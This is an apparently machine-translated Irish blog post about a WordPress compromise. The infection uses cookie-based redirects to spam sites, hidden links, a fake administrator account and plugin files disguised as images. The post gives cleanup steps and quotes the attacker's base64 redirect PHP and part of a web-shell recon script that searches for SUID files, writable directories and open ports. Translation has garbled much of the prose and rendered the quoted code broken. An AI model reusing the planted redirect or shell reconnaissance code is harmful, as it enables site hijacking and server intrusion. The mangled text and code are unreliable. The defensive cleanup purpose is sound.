An víreas blogosphere ... ach tá mé go raibh go?!

Sa mhí seo caite, bhí mé rabhadh a fuarthas víreas sa bhlag i roinnt cuairteoirí. I dtús báire neamhaird mé an rabhadh, toisc go suiteáilte mé antivirus maith go leor (Kaspersky AV 2009) agus cé go raibh mé ag caitheamh go leor ama ar an bhlag, ní bhfuair mé an rabhaidh víreas riamh (... Chonaic mé rud éigin amhrasach roimhe seo, a d'imigh an chéad athnuachan.
Thosaigh go mall le feiceáil éagsúlachtaí móra trácht na gcuairteoiríTar éis a tráchta tar éis titim le déanaí go seasta agus thosaigh sé a bheith ag daoine níos mó agus níos mó a insint dom go stealthsettings.com is virused. Inné Fuair ​​mé ó dhuine éigin a screenshot dhéanamh nuair a bac antivirus a script an stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Bhí sé go leor áititheach díom a chuir mé na foinsí uile a chuardach. An chéad smaoineamh a tháinig go dtí mo aigne a bhí le déanamh uasghrádú an leagan is déanaí de WordPress (2.5.1), ach ní roimh na seanchomhaid script uile WordPress a scriosadh agus a dhéanamh bunachar sonraí cúltaca. Níor tháinig torthaí ar bith ar an nós imeachta seo agus b'fhéidir go ndeachaigh sé le tamall fada a rá nuair a bhí an buba, más rud é nach ndearna sé é i ndíospóireacht níos mó ná caife, fuair sé Bheadh ​​Google agus sé go maith a fheiceáil.
MyDigitalLife.info, foilsíodh alt dar teideal "WordPress Hack: Ghnóthú agus Fix Google agus Search Engine nó Níl Thrácht ar Cookie atreorú chuig Do-Needs.info, AnyResults.Net, Golden-Info.net agus Láithreáin Neamhdhleathach Eile"Is é sin an deireadh an snáithe de dhíth orm.
Tá sé thart ar leas a bhaint as WordPress bunaithe ar fianán, Cé acu Sílim go bhfuil an-chasta agus rinne an leabhar. Cliste go leor a dhéanamh SQL Instealladh Bunachar Sonraí an bhlag, a chruthú úsáideoir dofheicthe seiceáil ghnáthamh simplí Painéal na nIonstraimí->Users, seiceáil na heolairí fhreastalaí agus comhaid "inscríofa" (Le chmod 777), a lorg agus fhorghníomhú comhaid leis na pribhléidí an úsáideora fhréamh nó grúpa. Níl a fhios agam a bhaint as an t-ainm agus a fheiceáil go bhfuil cúpla ailt scríofa mar gheall air, in ainneoin an bhfíric go bhfuil go leor blaganna atá ionfhabhtaithe, lena n-áirítear an Rómáin. OK ... beidh mé iarracht chun iarracht a dhéanamh generalities mar gheall ar an víreas a mhíniú.

Cad é an víreas?

An chéad, cuir isteach na foinsí de na leathanaigh ar a blogs, naisc dofheicthe do chuairteoirí ach infheicthe agus indexable d'innill chuardaigh, go háirithe Google. Ar an mbealach seo céim leathanach a aistriú go dtí suíomhanna léirithe ag an ionsaitheoir. Ar an dara dul síos, cuirtear isteach ceann Cód atreorú URL do chuairteoirí ag teacht ó Google, Beo, Yahoo, ... nó ó léitheoir RSS agus nach bhfuil an suíomh ann fianán. a antivirus bhraitheann an athdhíriú mar Trojan Clicker.HTML.

Comharthaí:

Meath ollmhór sa trácht na gcuairteoirí, Go háirithe ar blogs nuair a thagann an chuid is mó cuairteoirí ó Google.

Aitheantais: (is é seo an fhadhb anseo dóibh siúd nach bhfuil a fhios acu conas phpmyadmin, php and linux)

LA. AIRE! An Chéad a dhéanamh ar bhunachar sonraí cúltaca!

1. Seiceáil an comhad foinse index.php, header.php, footer.php, An ábhar blag agus a fheiceáil má tá cód a úsáideann criptiúchán base64 nó go bhfuil "más rud é ($ stát ==" Is uimhir 1 && ($ _COOKIE) == 0?) "foirm:

<? PHP
$ Seref = eagar ("google", "MSN", "beo", "AltaVista"
"Iarr", "Yahoo", "AOL", "CNN", "aimsir", "Alex");
$ Athcho'irithe Dlı = 0; foreach ($ Seref is $ ref)
más rud é (strpos (strtolower
($ _SERVER ['HTTP_REFERER']), $ ref) == Bréagach) {$ stát = "1;? Sos;}!
más rud é ($ stát == "Is uimhir 1 && ($ _COOKIE) == 0?) {header (" Suíomh: ". base64_decode (" '.) "http:// YW55cmVzdWx0cy5uZXQ = /') amach;
}>

... Nó rud éigin. Scrios an gcód seo!

Cliceáil ar an íomhá ...

Cód innéacs

Sa phictiúr thuas roghnaigh mé de dhearmad agus "<get_header PHP ();??>". Ba chóir go bhfanfaidh cód.

2. Úsáid phpMyAdmin agus téigh go dtí an tábla bunachar sonraí wp_usersNuair a sheiceáil mura bhfuil aon ainm úsáideora a cruthaíodh ar 00:00:00 0000-00-00 (Socrúchán féideartha user_login scríobh "WordPress". Scríobh aitheantas úsáideora (réimse ID) agus scrios ansin é.

Cliceáil ar an íomhá ...

úsáideoir falsa

* Ba chóir an líne ghlas a bhaint amach agus a choinneáil ar mhaithe ID. I gcás na An raibh ID = 8 .

3. Téigh go dtí an Tábla wp_usermeta, Cá háit a ndéanfaidh suite agus bhaint línte do ID (i gcás an réimse user_id Dealraíonn luach haitheantas ar scriosadh).

4. I dTábla wp_option, Téigh go dtí active_plugins agus féach cad plugin bhfuil ar chumas drochamhras faoi. Is féidir é a úsáid mar endings _old.giff, _old.pngg, _old.jpeg, _new.php.giff, srl. de shínte íomhá bréagacha le _old and _new.

SELECT * FROM wp_options ÁIT option_name = 'active_plugins'

Scrios an mbreiseán seo, ansin téigh go dtí an blag -> Painéal na -> Forlíontáin, a dhíghníomhachtú agus a ghníomhachtú breiseán áirithe.

Cliceáil ar an íomhá a fheiceáil gur dealraitheach comhad víreas active_plugins.

plugáil isteach

Lean an cosán ar FTP nó SSH, léirítear i active_plugins agus scrios an comhad ar an bhfreastalaí.

5. Chomh maith leis sin i phpMyAdmin, sa tábla wp_option, Aimsigh agus scrios an líne ina bhfuil "rss_f541b3abd05e7962fcab37737f40fad8"Agus i measc"internal_links_cache ".
I internal_links_cache dhéantar naisc spam criptithe sin le feiceáil i do bhlag agus a Google Adsense Cód, An hacker.

6. Is Molta go Focal faire a athrú Blag agus logáil isteach bain gach userele amhrasach. Uasghrádú go dtí an leagan is déanaí de WordPress agus leag an bhlag go nach bhfaighfí an clárú na n-úsáideoirí nua. Níl aon chaillteanas ... Ní féidir trácht a dhéanamh agus illogical.

Rinne mé iarracht thuas a mhíniú cé mhéad, cad atá le déanamh i gcás den sórt sin chun an blag a ghlanadh ón víreas seo. Tá an fhadhb i bhfad níos measa ná mar a fheictear agus ní réitítear fiú mar go n-úsáidtear é leochaileachtaí slándála an óstáil Webserver, a bhfuil blog.

Mar chéad bheart slándála, le rochtain SSH, A dhéanamh ar roinnt seiceálacha ar an bhfreastalaí a fheiceáil má aon chomhaid cosúil le * _old * agus * _new. * Le endings.giff,. jpeg,. pngg,. jpgg. Ba chóir na comhaid a scriosadh. Má athainmniú tú comhad, mar shampla. top_right_old.giff in top_right_old.phpFeicimid go bhfuil an comhad go díreach ar an bhfreastalaí cód leas a bhaint as.

Leideanna úsáideacha le haghaidh seiceála, glanadh, agus an freastalaí a dhaingniú. (trí SSH)

1. cd / tmp agus seiceáil má tá fillteáin cosúil le tmpVFlma nó má tá teaglamaí eile ainm céanna agus é a scriosadh. Féach ar an phictiúr thíos, dhá fillteáin den sórt sin as dom:

tmpserver

foldername rm-rf

2. Seiceáil elimiati (athrú chmod) agus is féidir tréithe fillteáin chmod 777

teacht ar gach comhad inscríofa i dir reatha: Faigh. -Cineál f-Perm-2-ls
teacht ar gach Eolairí inscríofa i dir reatha: Faigh. -Cineál d-Perm-2-ls
teacht ar gach Eolairí inscríofa agus comhaid i dir reatha: Faigh. -Perm-2-ls

3. Ag féachaint do chomhaid amhrasach ar an bhfreastalaí.

Faigh. -Ainm "* _new.php *"
Faigh. -Ainm "* _old.php *"
Faigh. -Ainm "*. Jpgg"
Faigh. -Ainm "* _giff"
Faigh. -Ainm "* _pngg"

4, AIRE! na comhaid a socraíodh go giotán SUID si SGID. Tá na comhaid a fhorghníomhú le pribhléidí an úsáideora (grúpa) nó fréimhe, nach bhfuil an t-úsáideoir a fhorghníomhú an comhad. Is féidir na comhaid mar thoradh ar chomhréiteach fhréamh, má saincheisteanna slándála. Má úsáideann tú na comhaid le giotán SUID agus SGID, a dhéanamh 'chmod 0 " ar nó dhíshuiteáil an bpacáiste a bhfuil siad iontu.

Leas a bhaint as bhfuil áit éigin sa ... foinse:

más rud é (! $ safe_mode) {
más rud é ($ os_type == 'nix') {
$ Os = Rith ('sysctl-n kern.ostype').;
$ Os = Rith ('sysctl-n kern.osrelease').;
$ Os = Rith ('sysctl-n kernel.ostype').;
$ Os = Rith ('sysctl-n kernel.osrelease').;
más rud é (folamh ($ úsáideora)) $ úsáideora = fhorghníomhú ('id');
$ Ainmneacha cleite = eagar (
"=>",
'Aimsigh comhaid suid' => 'a aimsiú /-cineál f-Perm-04000-ls',
'Aimsigh comhaid sgid' => 'a aimsiú /-cineál f-Perm-02000-ls',
'Aimsigh gach comhad inscríofa i láthair dir' => 'a aimsiú. -Cineál f-Perm-2-ls ',
'Aimsigh na Eolairí inscríofa i láthair dir' => 'a aimsiú. -Cineál d-Perm-2-ls ',
'Aimsigh na Eolairí inscríofa agus comhaid i láthair dir' => 'a aimsiú. -Perm-2-ls ',
'Taispeáin oscail calafoirt' => 'netstat-ar | grep-i éisteacht',
);
Eile {}
. $ Os_name = Rith ('Ver');
$ Úsáideoir = Rith ('macalla% ainm úsáideora%').;
$ Ainmneacha cleite = eagar (
"=>",
"Taispeáin seirbhísí runing '=>' tús glan '
'Liosta phróiseas Show' => 'tasklist'
);
}

Ar an mbealach seo ... go bunúsach fhaigheann sáruithe i réimse na slándála. Calafoirt a oscailt Eolairí "inscríofa" agus grúpa fhorghníomhú pribhléidí chomhaid / root.

Ar ais le níos mó ...

Roinnt blaganna ionfhabhtaithe: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / blog /,

www.mirabilismedia.ro / blog, Blog.einvest.ro
... Téann an liosta ar ... go leor.

Is féidir leat seiceáil má tá blag víreas, ag baint úsáide as inneall cuardaigh Google. cóip & greamaigh:

láithreán www.blegoo.com cheannach

Dea-oíche agus a mhéadú a bheith ag obair ;) Is gearr go mbeidh mé ag teacht suas le nuashonruithe Eugen ar prevezibil.imprevizibil.com.

BRB :)

CHUIG: Aird! Athrú téama WordPress nó a uasghrádú go dtí WordPress 2.5.1, nach bhfuil réiteach chun fáil réidh leis an víreas.

An víreas blogosphere ... ach tá mé go raibh go?!

Maidir leis an údar

Stealth

Paiseanta faoi gach rud a chiallaíonn gadget agus TF, scríobhaim le pléisiúr ar stealthsettings.com ó 2006 agus is breá liom rudaí nua a aimsiú leat faoi ríomhairí agus macOS, córais oibriúcháin Linux, Windows, iOS agus Android.

Leave a Comment